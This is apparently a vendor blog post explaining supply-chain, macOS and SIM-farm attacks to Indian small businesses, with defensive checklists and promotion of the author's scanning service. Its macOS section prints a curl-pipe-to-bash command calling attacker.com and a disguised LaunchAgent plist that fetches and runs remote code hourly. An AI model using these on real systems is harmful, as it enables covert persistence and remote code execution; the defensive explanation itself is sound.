What Happened
Last week, the cybersecurity landscape reminded us of a uncomfortable truth: attackers don't need new exploits when old ones still work. A coordinated wave of incidents hit the headlines—a $290 million DeFi protocol breach, macOS systems compromised through living-off-the-land (LotL) techniques, and a sprawling SIM farm network targeting mobile users across multiple countries.
But here's what caught my attention: none of these were novel attacks. The DeFi hack exploited a smart contract vulnerability that mirrors flaws we've seen for years. The macOS attacks used built-in system tools—launchd, curl, basic shell scripts—to establish persistence. The SIM farms? They're running the same social engineering playbook from 2015, just at scale.
The real story isn't the attacks themselves. It's why they keep working. Across all three incidents, the common thread was negligence in the supply chain. Dependencies nobody audited. Packages installed without verification. Systems patched months too late. In my years building enterprise systems for Fortune 500 companies, I watched security teams struggle with exactly this problem—but they had budgets and dedicated teams. Most Indian SMBs? They're flying blind.
Why This Matters for Indian Businesses
If you run a software company, e-commerce platform, or fintech startup in India, this should alarm you. Here's why:
1. The DPDP Act is Watching
India's Digital Personal Data Protection Act (DPDP) now requires you to maintain reasonable security measures and report breaches to CERT-In within 6 hours. A supply chain compromise that goes undetected for weeks? That's a compliance violation with penalties up to ₹5 crores.
2. Your Dependencies Are Your Liability
When I was architecting security for large enterprises, we had the luxury of scanning every third-party package before deployment. Most Indian SMBs don't. You're probably running npm packages, Python libraries, or Docker images from repositories you've never audited. If one of those gets compromised—and they do, regularly—your entire application becomes a liability.
3. Attackers Know You're Not Watching
The SIM farm operators and DeFi hackers specifically target SMBs because they know the security posture is weak. They're not breaking in—they're walking through doors left open.
Technical Breakdown: How These Attacks Actually Work
Let me walk you through the mechanics of a typical supply chain attack—because understanding it is the first step to defending against it.
graph TD
A[Attacker identifies popular package] -->|Step 1| B[Submits malicious update]
B -->|Step 2| C[Package published to npm/PyPI]
C -->|Step 3| D[SMB auto-updates dependency]
D -->|Step 4| E[Backdoor installed in production]
E -->|Step 5| F[Data exfiltration begins]
E -->|Alternative| G[Lateral movement to other systems]
G -->|Step 6| H[Full infrastructure compromise]The DeFi Attack Pattern
The $290M DeFi hack followed a predictable sequence:
- Reconnaissance: Attackers identified a popular smart contract library used by dozens of protocols.
- Compromise: They gained access to the package maintainer's GitHub account (likely through credential stuffing—a technique from 2010).
- Injection: A single line of malicious code was added to the library—a function that redirected funds to attacker-controlled wallets.
- Propagation: Every protocol that auto-updated the dependency inherited the vulnerability.
- Exploitation: The malicious code executed silently, draining funds before anyone noticed.
The macOS LotL Abuse
The macOS attacks were even simpler. Attackers used system tools already present on every Mac:
# Attacker runs this via initial compromise (phishing, weak SSH, etc.)
/usr/bin/curl -s http://attacker.com/payload.sh | /bin/bash
# This downloads and executes a script that:
# 1. Creates a persistent LaunchAgent
# 2. Establishes a reverse shell
# 3. Exfiltrates SSH keys, browser data, and credentialsThen they create a LaunchAgent for persistence:
<!-- ~/.LaunchAgents/com.apple.update.plist -->
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.update</string>
<key>ProgramArguments</key>
<array>
<string>/bin/bash</string>
<string>-c</string>
<string>/usr/bin/curl http://attacker.com/beacon | /bin/bash</string>
</array>
<key>RunAtLoad</key>
<true/>
<key>StartInterval</key>
<integer>3600</integer>
</dict>
</plist>This runs every hour, completely invisible to the user. No new exploits. Just old techniques applied at scale.
The SIM Farm Operation
The SIM farms were even more direct: they're using stolen or spoofed phone numbers to intercept SMS-based 2FA codes. Here's how:
- Acquire SIM cards in bulk (often through corrupted telecom employees or fraudulent registrations).
- Register phone numbers under fake identities.
- Target victims with phishing emails claiming account verification needed.
- Intercept SMS codes when the victim enters their credentials.
- Compromise accounts with stolen 2FA tokens.
Know your vulnerabilities before attackers do
Run a free VAPT scan — takes 5 minutes, no signup required.
Book Your Free ScanHow to Protect Your Business
Here's a practical defense matrix. I've organized it by implementation difficulty because I know most SMBs are resource-constrained.
| Protection Layer | Action | Difficulty | Impact |
|---|---|---|---|
| Dependency Audit | Scan all npm, pip, and package manager dependencies for known vulnerabilities | Easy | High |
| Lock File Verification | Use npm ci instead of npm install; commit lock files | Easy | High |
| SBOM Generation | Create software bill of materials for all dependencies | Medium | Medium |
| 2FA Upgrade | Migrate from SMS to TOTP or hardware keys | Medium | Critical |
| Code Review | Mandatory peer review for all dependency updates | Medium | High |
| Automated Scanning | CI/CD pipeline integration for vulnerability scanning | Medium | High |
| Secrets Management | Use HashiCorp Vault or AWS Secrets Manager (not .env files) | Hard | Critical |
| Supply Chain Attestation | Implement SLSA framework for build integrity | Hard | Medium |
Quick Fix: Scan Your Dependencies Right Now
If you use Node.js, run this immediately:
# Install npm audit (usually pre-installed)
npm audit
# For detailed vulnerability info
npm audit --json > vulnerabilities.json
# Auto-fix what you can
npm audit fix
# Check for outdated packages
npm outdatedFor Python projects:
# Install safety
pip install safety
# Scan your dependencies
safety check
# Generate a report
safety check --json > python-vulns.jsonFor Docker images:
# Use Trivy to scan container images
trivy image your-image:latest
# Scan with detailed output
trivy image --severity HIGH,CRITICAL your-image:latestThe Deeper Problem: Why We Keep Making the Same Mistakes
As someone who's reviewed hundreds of Indian SMB security postures, I've noticed a pattern. It's not that SMBs don't know they should audit dependencies. They do. It's that they're juggling too many priorities with too few resources.
You're building features. You're scaling infrastructure. You're fighting fires. Security feels like a checkbox, not a priority—until you're breached.
This is exactly why I built Bachao.AI. Not because Indian SMBs are careless, but because they need security solutions that fit their reality: fast, affordable, and practical.
How Bachao.AI Detects This
We've designed our platform to catch supply chain attacks and configuration weaknesses before they become breaches:
API Security: If you're exposing APIs (and most modern apps do), we scan for authentication bypasses, injection flaws, and insecure direct object references—the exact vectors used in DeFi attacks.
Dark Web Monitoring (₹9,999/year): We watch for your credentials and domain mentions on dark web forums and paste sites. If your team's credentials leak, we alert you within hours—before attackers use them.
Incident Response (24/7, ₹1.5L/year): When (not if) you get compromised, our team handles the breach response and CERT-In notification within 6 hours—keeping you compliant with DPDP Act requirements.
What We're Actually Scanning For
When you run a Bachao.AI VAPT scan, here's what we check:
# Dependency vulnerabilities
✓ npm audit equivalent for Node.js
✓ pip audit equivalent for Python
✓ Maven/Gradle scanning for Java
✓ Composer scanning for PHP
# Configuration weaknesses
✓ Exposed .env files
✓ Hardcoded credentials in git history
✓ Overprivileged IAM roles
✓ Unencrypted secrets in environment variables
# Infrastructure issues
✓ Unpatched systems (CERT-In's concern)
✓ Weak SSH configurations
✓ Missing security headers
✓ Insecure TLS configurationsWhat You Should Do This Week
- Run
npm audit/pip audit/ equivalent on all your applications. Document what you find. - Upgrade critical dependencies immediately. Don't wait for the perfect moment.
- Enable 2FA on all developer accounts—GitHub, npm, PyPI, AWS, GCP. Not SMS. Use an authenticator app.
- Commit your lock files to version control. Never let dependency versions drift.
- Book a free Bachao.AI scan (takes 15 minutes, no credit card needed). See what we find.
The Uncomfortable Truth
Attackers aren't getting smarter. They're just getting more efficient. They've found that old techniques still work because most businesses haven't implemented basic hygiene.
The $290M DeFi hack? Preventable with code review and dependency pinning. The macOS LotL attacks? Preventable with endpoint monitoring and SSH key management. The SIM farms? Preventable with TOTP instead of SMS 2FA.
None of this is cutting-edge defense. It's just doing the basics consistently.
The question isn't whether you'll be attacked. You will be. The question is whether you'll detect it in time to prevent catastrophic damage. And that depends on whether you're watching your supply chain.
Start this week. Run a scan. Fix what you find. Update your dependencies. Upgrade your 2FA. These aren't optional anymore—they're table stakes.
Ready to audit your supply chain?
Book Your Free VAPT Scan → (15 minutes, no credit card required)
We'll scan your applications, infrastructure, and dependencies. You'll get a report with specific, actionable fixes. Most SMBs find critical vulnerabilities they didn't know existed.
Written by Shouvik Mukherjee, Founder of Bachao.AI. I spent 12 years building secure systems for Fortune 500 companies before founding Bachao.AI to make enterprise-grade cybersecurity accessible to Indian SMBs. Follow me on LinkedIn for daily insights on securing your business.
Originally reported by The Hacker News
Written by Shouvik Mukherjee, Founder of Bachao.AI. Follow me on LinkedIn for daily cybersecurity insights for Indian businesses.